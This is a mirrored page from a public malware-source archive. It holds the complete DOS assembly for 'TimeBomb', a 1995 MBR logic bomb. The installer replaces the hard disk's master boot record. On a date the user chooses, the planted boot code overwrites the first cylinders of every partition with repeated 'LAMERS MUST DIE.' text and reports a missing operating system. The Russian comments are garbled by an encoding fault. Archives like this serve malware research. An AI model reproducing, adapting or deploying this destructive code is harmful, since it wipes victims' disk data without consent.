Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
Code Releases Activity
0c6b1e85aa
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.timebomb.asm
vxunderground 3e7d2e8262
Add files via upload
2021-01-12 18:01:59 -06:00

473 lines
10 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun
; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995
;
;
; <20>®«­®áâìî § ¬¥­ï¥â MBR. <20>® ¤®á⨦¥­¨¨ ®¯à¥¤¥«¥­­®© ¤ âë ä â «ì­® £à®å ¥â ¢¨­â
;
; ‘â àë© MBR § ¯¨á뢠¥âáï ¢ ä ©« c:\mbr.bak, çâ®¡ë ¬®¦­® ¡ë«® ¢®ááâ ­®¢¨âì,
; ¥á«¨ çâ®. “¯à ¢«¥­¨ï áâ àë© MBR ­¥ ¯®«ãç ¥â, â ª çâ® ¥á«¨ ®­ ¤¥« « çâ®-â®
; ¡®«¥¥ 㬭®¥, ­¥¦¥«¨ § £à㧪  á¨á⥬ë á  ªâ¨¢­®£® à §¤¥«  - TimeBomb ¯à¨¤¥âáï
; ¯¥à¥¤¥« âì.
;
; <20>ਠáà ¡ â뢠­¨¨ TimeBomb § â¨à îâáï ¯¥à¢ë¥ 4 樫¨­¤à  ª ¦¤®£® à §¤¥«  ­ 
; ¢¨­â¥, ¢ª«îç ï «®£¨ç¥áª¨¥ ¤¨áª¨ DOS (extended partition)
;
; ‘«¥¤ã¥â § ¬¥â¨âì, çâ® Non-DOS à §¤¥«ë (HPFS, ­ ¯à¨¬¥à) ¯à¨ í⮬ ¯®áâà ¤ îâ
; ­¥§­ ç¨â¥«ì­® - ¢ á¢ï§¨ á ª®à¥­­ë¬ ®â«¨ç¨¥¬ ¨å áâàãªâãàë ®â DOS FAT.
;
killed_cyl = 4 ; —¨á«® 㡨¢ ¥¬ëå 樫¨­¤à®¢ ¢ ª ¦¤®¬ à §¤¥«¥
xor_value = 73h ; ‡­ ç¥­¨¥ § è¨ä஢ ­¨ï ‚ è¥£® ¯®á«¥¤­¥£® á«®¢  ;-)
locals
cseg segment
assume cs:cseg
org 100h
.286
start proc near
;
; ˆ­áâ ««ïæ¨ï
;
; <20>஢¥à塞 ª®¬ ­¤­ãî áâபã
mov si, 80h
mov bl, byte ptr [si]
xor bh, bh
cmp bl, 8
jnc @@checkdate
help:
; ª®¬ ­¤­®© áâப¥ ­¥ 㪠§ ­  ¤ â  - ¢ë¢®¤¨¬ ¯®¤áª §ªã
mov dx, offset @@title
mov ah, 9
int 21h
int 20h
; <20>®«ã祭¨¥ BCD-ç¨á«  ¨§ ª®¬. áâப¨
getBCD proc near
dec si
mov ax, word ptr [si+bx] ; <20>¥à¥¬ ¯®á«¥¤­¨¥ ¤¢¥ æ¨äàë
sub ax, '00' ; ASCII -> BIN
xchg al, ah
db 0d5h, 10h ; AAD á ¬®¤¨ä¨ª â®à®¬ 16
cmp al, 9ah
jnc help
dec si ; ‘ࠧ㠯¥à¥å®¤¨¬ ª á«¥¤ãî饬㠯®«î
dec si
retn
getBCD endp
@@checkdate: ; <20>஢¥à塞 ¤ âã (á­ ç «  £®¤, § â¥¬ ¬¥áïæ, § â¥¬ ç¨á«®)
; ¨ ¯à¨¢®¤¨¬ ¥¥ ª ­ã¦­®¬ã ä®à¬ âã
; Š®à४⭮áâì ¤ âë ­¥ ¯à®¢¥à塞 - ¦â® ¯à®¡«¥¬  ¯®«ì§®¢ â¥«ï -
; çâ® ®­ â ¬ ¢¢¥«
call getBCD ; <20>¥à¥¬ æ¨äàë £®¤ 
mov byte ptr year, al ; <20>®«ã稫¨ BCD-year
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
jne help
call getBCD ; <20>¥à¥¬ æ¨äàë ¬¥áïæ 
mov byte ptr month, al ; <20>®«ã稫¨ BCD-month
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
jne help
call getBCD ; <20>¥à¥¬ æ¨äàë ¤­ï
mov byte ptr day, al ; <20>®«ã稫¨ BCD-day
@@singledisk:
;
; ‡ ¬¥­ï¥¬ MBR ¢¨­â  ᢮¨¬ ª®¤®¬ ¨§ bomb proc
;
; —¨â ¥¬ áâ àë© MBR, á®å࠭塞 ¥£® ¢ c:\mbr.bak, ¯¨è¥¬ ᥡï
;
; —¨â ¥¬ MBR
mov cx, 1
mov dx, 80h
mov ax, 201h
mov bx, offset buffer
int 13h
jnc @@rd_ok
mov dx, offset @@rd_err
@@err_exit: ; ‚뢮¤ á®®¡é¥­¨ï ¨§ DX ¨ ¢ë«¥â ¯® ®è¨¡ª¥
mov ah, 9
int 21h
retn
@@rd_ok:
; ‘®§¤ ¥¬ ä ©«
mov dx, offset @@fname
xor cx, cx
mov ah, 3ch
int 21h
jnc @@cr_ok
mov dx, offset @@cr_err
jmp @@err_exit
@@cr_ok:
; <20>¨è¥¬ ¢ ä ©«
mov bx, ax
mov cx, 512
mov dx, offset buffer
mov ah, 40h
int 21h
jnc @@wr_ok
mov dx, offset @@wr_err
jmp @@err_exit
@@wr_ok:
; ‡ ªà뢠¥¬ ä ©«
mov ah, 3eh
int 21h
;
; <20>¥à¥­®á¨¬ ᢮© MBR ­  ¬¥áâ® áâ à®£®
;
mov si, offset bomb
mov di, offset buffer
mov bx, di
mov cx, di
sub cx, si
cld
rep movsb
;
; ‡ ¯¨á뢠¥¬ ­®¢ë© MBR ¯®¢¥àå áâ à®£®
;
mov cx, 1
mov dx, 80h
mov ax, 301h
int 13h
mov dx, offset @@mbr_wr_err
jc @@err_exit
mov dx, offset @@done_msg
jmp @@err_exit
; ‘®®¡é¥­¨ï ®¡ ®è¨¡ª å
@@rd_err: db 'Error read the MBR of C:',13,10,'$'
@@cr_err: db 'Error creating the '
@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$'
@@wr_err: db 'Error writing backup file',13,10,'$'
@@mbr_wr_err: db 'Error writing new MBR',13,10,'$'
@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$'
; ‡ áâ ¢ª 
@@title:
db 13,10,10
db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10
db ' Usage: timebomb <date>',13,10,10
db ' Where <date> is a fatal date for your computer.',13,10
db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10
db 'Good Luck ;)',13,10,'$'
start endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; ’¥ªáâ ¡®¬¡ë. Š®¬¡¨­¨àã¥âáï á MBR (®â MBR ¡¥à¥âáï ¯ àâ¨è­)
;
; <20>â®â ª®¤ ¡ã¤¥â áâ à⮢ âì á  ¤à¥á  0:7c00h
;
bomb proc near
; <20> áâà ¨¢ ¥¬ á⥪ ¨ ¯¥à¥­®á¨¬ MBR, ªã¤  ­ ¤® (0:600h)
cli
mov ax, cs
mov ss, ax
mov ds, ax
mov es, ax
mov si, 7c00h
mov sp, si
push si ; <20>â® ­ã¦­® ¤«ï ¯®á«¥¤ãî饣® áâ àâ  boot' 
cld
mov cx, 1beh / 2 ; <20>®á«¥ â ª®£® ¯¥à¥­®á  SI ¡ã¤¥â 㪠§ë¢ âì
mov di, 600h ; ­  ¯ àâ¨è­
rep movsw
push ax ; ‘¥£¬¥­â
push offset beginbomb - offset bomb + 600h ; ‘¬¥é¥­¨¥
retf
beginbomb:
; <20>஢¥à塞 ¢à¥¬ï
mov ah, 4
int 1ah ; <20>à®ç«¨ ¤ âã ¢ CX:DX
jc @@skipbomb ; …᫨ ç áë ­¥ à ¡®â îâ -> ¯à®¯ã᪠¥¬ ¯à®¢¥àªã
year = $ + 2
cmp cl, 12h ; <20>஢¥à塞 £®¤
jc @@skipbomb ; ƒ®¤ ­¥ ᮢ¯ « ;)
jne @@explode ; …᫨ íâ®â £®¤ ¯à®è¥« - ¢§à뢠¥¬áï ­¬¥¤«¥­­®
month = $ + 3
day = $ + 2
cmp dx, 1234h ; ˆ¬¥­­® â ª, çâ®¡ë ­¥ ᣥ­¥à¨à®¢ «áï
; ª®à®âª¨© ¢ à¨ ­â ¤«ï CMP
jc @@skipbomb ; <20>¥ ᮢ¯ « ¤¥­ì ¨ ¬¥áïæ
@@explode:
;
; ‚ᥠᮢ¯ «®, ¯à¨è«  ç¥à­ ï ¯®à ...
;
; ‘â¨à ¥¬ ¯¥à¢ë¥ 樫¨­¤àë ª ¦¤®£® à §¤¥«  (¢ª«îç ï «®£¨ç¥áª¨¥
; ¤¨áª¨ DOS)
;
; “áâ ­ ¢«¨¢ ¥¬ ¢ ª®¤¥ ¡®¬¡ë ¯ à ¬¥âàë ¢¨­â 
mov dl, 80h
call destroy
; “áâ ­ ¢«¨¢ ¥¬ ¯ à ¬¥âàë  â®à®£® ¢¨­â , ¥á«¨ ®­ ¥áâì
ror dl, 1 ; …᫨ ®¤¨­ ¤¨áª, ä« £ CF ¡ã¤¥â ãáâ ­®¢«¥­
jc @@singledisk
mov dl, 81h
call destroy
@@singledisk:
jmp @@incorrect ; ‚뢮¤¨¬ á®®¡é¥­¨¥ "Missing operating ssytem"
@@skipbomb:
;
; Žâà ¡®âª  ­®à¬ «ì­®£® ª®¤  MBR
;
; ˆé¥¬ § £à㧮ç­ë© à §¤¥«
mov cl, 4 ; …áâì ¢á¥£® 4 ¢ à¨ ­â  ...
@@searchboot: ; –¨ª« ¯®¨áª 
mov dx, word ptr [si] ; ‘ࠧ㠧 £à㦠¥¬ ¢ DX â®, çâ® ­ã¦­®
cmp dl, 80h ; <20>â®â à §¤¥« § £à㧮ç­ë© ?
je @@boot
add si, 10h ; <20>¥à¥å®¤¨¬ ª á«¥¤ãî饩 § ¯¨á¨
loop @@searchboot
; <20>¥ ­ è«¨ - ¢ë¤ ¥¬ á®®¡é¥­¨¥
@@incorrect:
call errmsg
db 'Missing operating system',0
@@boot: ; ‡ £à㦠¥¬ boot-ᥪâ®à ¨ ¯¥à¥¤ ¥¬ ¥¬ã ã¯à ¢«¥­¨¥
mov cx, word ptr [si+2] ; —â® ­ ¤® - ¢ CX
mov ax, 201h ; —¨â ¥¬ 1 ᥪâ®à
pop bx ; <20>®  ¤à¥áã 0:7c00h
push bx
int 13h
jnc @@exit
call errmsg
db 'Error reading operating system',0
@@exit:
cmp word ptr [bx + 510], 0aa55h
jne @@incorrect
retn ; ‡ ¯ã᪠¥¬ boot
;
; <09>®¤¯à®£à ¬¬ë
;
; ‚ë¤ ç  á®®¡é¥­¨ï ®¡ ®è¨¡ª¥
errmsg proc near
sti
cld
pop si
mov ah, 0eh
@@nextchar:
lodsb
or al, al
je $
int 10h
jmp @@nextchar
errmsg endp
; Ž¡å®¤ ¢á¥å à §¤¥«®¢ ¤¨áª  á § ¯¨áìî ¨å ¯ à ¬¥â஢ ¢ ¡ãä¥à
getpart proc near
; <20>⮠४ãàᨢ­ ï äã­ªæ¨ï.
; <20>  ¢å®¤¥ ¢ SI âॡã¥âáï 㪠§ â¥«ì ­  ®ç¥à¥¤­®© à §¤¥«
; ¡ãä¥à ¯®  ¤à¥áã ES:DI ¯¨èãâáï ¯ à ¬¥âàë ⥪.à §¤¥« 
mov cx, 4 ; ‘ç¥â稪 à §¤¥«®¢ ¢ ª ¦¤®¬ MBR
@@nextpart:
; <20>஢¥à塞 ⨯ à §¤¥« 
cmp byte ptr [si+4], 0 ; <20>¥¨á¯®«ì§ã¥¬ë© à §¤¥«
je @@exit
; <20>¨è¥¬ ¢ ¡ãä¥à ¯ à ¬¥âàë à §¤¥« 
mov ax, word ptr [si] ; ƒ®«®¢ 
stosw
mov dx, ax ; ƒ®â®¢¨¬áï ª® ¢å®¤ã ¢ ४ãàá¨î
disk1 = $ + 1
mov dl, 80h ; <20>®¬¥à ®¡à ¡ â뢠¥¬®£® ¤¨áª 
mov ax, word ptr [si+2]
stosw ; –¨«¨­¤à/ᥪâ®à
; ‘­®¢  ¯à®¢¥à塞 ⨯ à §¤¥«  - ­¥ à áè¨à¥­­ë© «¨ ®­ ?
cmp byte ptr [si+4], 5
jne @@exit ; <20>¥â - ¨¤¥¬ ¤ «ìè¥
; <20>ëà塞 ¢ ४ãàá¨î
; —¨â ¥¬ MBR à áè¨à¥­­®£® à §¤¥« 
push cx ; ‘®å࠭塞 áç¥â稪
push si ; ‘®å࠭塞 㪠§ â¥«ì ­  à §¤¥«ë
add bx, 512 ; <20>த¢¨£ ¥¬ 㪠§ â¥«ì ­  ¡ãä¥à
mov cx, ax ; ‘¥©ç á CX:DX 㪠§ë¢ îâ ­  MBR
mov ax, 201h ; à áè¨à¥­­®£® à §¤¥« 
int 13h ; —¨â ¥¬ à áè¨à¥­­ë© à §¤¥« ¢ 0:BX
jnc @@rec ; <20>஢¥àª  ­  ª®à४⭮áâì
; ‚ë室¨¬ ¨§ ४ãàᨨ ¢ á«ãç ¥ á¡®ï
pop si
pop cx
sub bx, 512
jmp @@exit
@@rec:
mov si, bx ; “áâ ­ ¢«¨¢ ¥¬ 㪠§ â¥«ì
add si, 1beh ; ­  â ¡«¨æã à §¤¥«®¢
call getpart
@@exit:
add si, 10h
loop @@nextpart
; ‚ë室 ¨§ ४ãàᨨ
sub bx, 512
pop dx
pop si
pop cx
push dx
retn
getpart endp
; “­¨ç⮦¥­¨¥ ᮤ¥à¦¨¬®£® ⥪ã饣® ¤¨áª 
destroy proc near
; <20>®«ãç ¥¬ ¯ à ¬¥âàë ¢¨­â , 㪠§ ­­®£® ¢ DL
mov byte ptr ds:[offset disk - offset bomb + 600h], dl
mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl
mov ah, 8
int 13h
mov byte ptr ds:[heads - offset bomb + 600h], dh
and cl, 63
mov byte ptr ds:[sectors - offset bomb + 600h], cl
push dx
mov bx, 0a00h ; <20>ãä¥à ¤«ï ç⥭¨ï MBR à áè¨à¥­­ëå à §¤¥«®¢
; <20>® 室㠤¥«  ª BX ¡ã¤¥â ¯à¨¡ ¢«ïâìáï ¯® 512 -
; â ª çâ® ¬ ªá¨¬ «ì­ë© ã஢¥­ì ¢«®¦¥­­®áâ¨
; á®áâ ¢¨â 57 à §¤¥«®¢
mov di, 500h ; <20>ãä¥à ¯®¤ ¯ à ¬¥âàë ¤«ï int 13h (64 ¤¨áª )
; <20>¥ªãàᨢ­® ®¡å®¤¨¬ «®£¨ç¥áª¨¥ ¤¨áª¨, § ¯¨áë¢ ï ¢ ¡ãä¥à ¯ à ¬¥âàë
; ¤«ï int 13h
push si ; Š®à४â­ë© ¢å®¤ ¢ ४ãàá¨î
push cx
xor ax, ax ; “áâ ­®¢ª  ¤«ï áâ¨à ­¨ï £« ¢­®£® MBR
stosw
inc ax
stosw
call getpart ; Ž¡å®¤ à §¤¥«®¢
; ‘®§¤ ¥¬ §­ ç¥­¨¥ ¯à®¯¨á뢠­¨ï
; ‘¥©ç á ¢ bx «¥¦¨â ¤«¨­  ¯à®¯¨á뢠¥¬ëå ¤ ­­ëå ¢ ¯ à £à ä å - 800h
push di ; ‘®å࠭塞 㪠§ â¥«ì ­  墮áâ ᯨ᪠ ¯ à ¬¥â஢
mov di, bx ; DI ¡ã¤¥â 㪠§ â¥«ì ­  ¡ãä¥à ¤«ï ¤ ­­ëå
shl di, 4 ; <20>ãä¥à ¡ã¤¥â à á¯®« £ âìáï ᮠᬥ饭¨ï 8000h
push di ; ‘®å࠭塞  ¤à¥á ¡ãä¥à  § ¯®«­¥­¨ï
@@nextword:
mov si, offset lmd - offset bomb + 600h
mov cx, 16
@@nextchar:
lodsb
xor al, xor_value
stosb
loop @@nextchar
dec bx
jne @@nextword
; ˆ¤¥¬ ­ § ¤ ¯® ¡ãä¥àã
pop bx ; ‚®ááâ ­ ¢«¨¢ ¥¬  ¤à¥á ¡ãä¥à 
pop si ; ‚®ááâ ­ ¢«¨¢ ¥¬ 㪠§ â¥«ì ­  ¯ à ¬¥âàë
mov cx, si ; ‚ëç¨á«ï¥¬ ç¨á«® § â¨à ¥¬ëå à §¤¥«®¢
sub cx, 500h
shr cx, 2
std
lodsw ; <20>¥à¥å®¤¨¬ ª ¯®á«¥¤­¥© § ¯¨á¨ ¢ ¡ãä¥à¥
@@nextpart:
push cx ; ‘®å࠭塞 áç¥â稪
lodsw ; <20>¥à¥¬ ¯ à ¬¥âàë à §¤¥« 
mov cx, ax ; –¨«¨­¤à/ᥪâ®à
lodsw
mov dx, ax ; ƒ®«®¢ 
disk = $ + 1
mov dl, 80h ; <20>®¬¥à § â¨à ¥¬®£® ¤¨áª 
mov si, killed_cyl ; ‘ç¥â稪 㡨¢ ¥¬ëå 樫¨­¤à®¢
; <20>ய¨á뢠¥¬ à §¤¥«
@@nexthead:
sectors = $ + 1
mov ax, 310h ; !!!!
int 13h
inc dh ; ‘«¥¤ãîé ï £®«®¢ 
heads = $ + 2
cmp dh, 16 ; ‚¥áì 樫¨­¤à ?
jne @@nexthead
add cx, 64 ; ‘«¥¤ãî騩 樫¨­¤à
xor dh, dh ; <20> ç¨­ ¥¬ á ­ã«¥¢®© £®«®¢ë
dec si
jne @@nexthead
pop cx ; ‚®ááâ ­ ¢«¨¢ ¥¬ áç¥â稪
loop @@nextpart ; ¨ ªàã⨬ 横« ¯® à §¤¥« ¬
pop dx
retn
destroy endp
lmd:
irpc ch, <LAMERS MUST DIE.>
db '&ch' xor xor_value
endm
bomb endp
buffer: ; ‘ ¡ã¤¥¬ ç¨â âì áâ àë© mbr
dw offset buffer - offset bomb
cseg ends
end start
View Git Blame Copy Permalink